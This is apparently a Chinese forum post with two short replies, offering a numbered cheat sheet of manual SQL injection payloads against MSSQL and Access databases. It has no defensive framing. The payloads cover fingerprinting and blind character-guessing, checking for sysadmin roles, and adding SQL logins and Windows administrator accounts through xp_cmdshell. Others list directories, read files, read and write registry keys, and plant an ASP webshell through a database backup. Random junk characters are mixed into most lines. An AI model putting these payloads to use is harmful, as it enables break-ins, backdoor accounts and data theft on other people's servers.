社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 5216阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 kBUufV~  
  2.初步判断是否是mssql ;and user>0 [EcV\.  
9/Q S0  
  3.注入参数是字符'and [查询条件] and ''=' GfQ^@Tl  
0 wYiu  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' n%8#?GC`  
V'$oTZ`  
  5.判断数据库系统 m4\g o  
oYGUjI  
  ;and (select count(*) from sysobjects)>0 mssql ;C6O3@Q  
IM2/(N.%  
  ;and (select count(*) from msysobjects)>0 access -q|*M:R  
| )S{(#k  
|<7i|J  
>T$7{ ~  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 EXH!glR[$  
2tlO"c:_/  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @Yb Z 8Uc  
Hm<M@M$aG  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -<12~HKK::  
gtl;P_  
  9.(1)猜字段的ascii值(access) 5D >BV *"  
@<%oIE~]F  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 3Y=,r!F.h  
z4 nou>  
  (2)猜字段的ascii值(mssql) >cSi/a,L  
$R3.yX=[\  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 %!#rrt,F  
=`ywd]\7  
  10.测试权限结构(mssql) A1Ibx|K  
G0^V!0I&O  
AIf[W">\  
cKSfqqPm$"  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- L_`Xbky  
"&s9cO.H  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- -!JlM@  
Ty(yh(oYF`  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- HK=CP0H  
U5 -zB)V  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~m3V]v(q7  
@ICejB<  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- /6A:J]Q_  
2M5*bNU_:  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- WCWSLEAza  
yg.\^C  
  ;and 1=(select IS_MEMBER('db_owner'));-- wZ}n3R,   
u_hE7#i  
yDDghW'\WU  
`8qT['`#R  
  11.添加mssql和系统的帐户 20S9/9ll  
D;K&  
  ;exec master.dbo.sp_addlogin username;-- Bl:{p>-q  
  ;exec master.dbo.sp_password null,username,password;-- I}I}K~se*  
@)S sKk|  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 7v.#o4nPK  
D6"~fjHh  
  ;exec master.dbo.xp_cmdshell 'net user username password hG< a  
:K!GR  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- H ,01o5J  
3m?@7F  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- ID_|H?.  
oR!n bm  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- &! 5CwEIF  
 rytGr9S  
7/[TE  
MLEIx()  
  12.(1)遍历目录 JuKk"tr~RB  
#3AYz82w  
  ;create table dirs(paths varchar(100), id int) w+URCj  
r|u6OF>  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' OcyiL)tv5  
cWX"e6  
  ;and (select top 1 paths from dirs)>0 1D 3 dYVE  
Qq @_Z=mt  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) tRpL0 =y  
KY;uO 8Te  
,'/HcF?yf  
IF,i^,  
  (2)遍历目录 S&gKgQD"Q  
nph7&[xQI  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #3 }5cC8_  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ir( -$*J  
.YnP% X=  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ~5XL@jI^  
8YT_DM5iI  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 . x\/XlM  
6:SK{RSURC  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Dohl,d  
jpPdjQ  
{7j6$.7J$&  
3N)Ycf8  
  13.mssql中的存储过程 :G6 xJlE|  
~_/<PIm  
  xp_regenumvalues 注册表根键, 子键 qcpG}o+&D  
}R?v"6aBS  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 lN*1zM<6;  
\ (3Qqbw  
  xp_regread 根键,子键,键值名 u(TgWp5WF  
0%q{UW2  
  ;exec xp_regread ^=heen<S%  
[<@A8Q5,y  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 8\W3Fv Q  
Lv`8jSt\  
  xp_regwrite 根键,子键, 值名, 值类型, 值 71}L# nQ  
F|h ,a;2  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 TYmUPS$  
f0N)N}y  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Q KDb  
c)n0D=  
  xp_regdeletevalue 根键,子键,值名 -E,{r[Sp  
0& SrKn  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 r7wx?{~ 28  
)\:lYI}Wpm  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 *cI6 &;y  
 !z "a_  
3f7t%  
}tl8(kjm  
  14.mssql的backup创建webshell K2cpf  
|P[D2R}  
  use model {YxSH %  
Rd@n?qB  
  create table cmd(str image); )U/@J+{{  
fjz2m   
  insert into cmd(str) values (''); US*<I2ZLh  
It!.*wp  
  backup database model to disk='c:\l.asp'; =km-` }I,  
1z $}*`  
u\Erta`  
k8t Na@H  
  15.mssql内置函数 0W<nE[U  
hD9' `SQ  
  ;and (select @@version)>0 获得Windows的版本号 X&;]  
nw]e_sm  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa \CEnOq  
BSq;R G(  
  ;and (select user_name())>0 爆当前系统的连接用户 `hQ!*f6  
}GU6Q|s[u[  
  ;and (select db_name())>0 得到当前连接的数据库 d q+7K  
 4.Jaw+  
d9Ow 2KrC  
qkR,<"C|`  
  16.简洁的webshell y1jGf83  
t"Vr;0!{  
  use model EL)/5-=S  
fSQ3 :o  
  create table cmd(str image); b`={s  
j8ohzX[Y  
  insert into cmd(str) values (''); Ws}kb@5  
s+\qie  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
枫
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录 或 注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
10+5=?,请输入中文答案:十五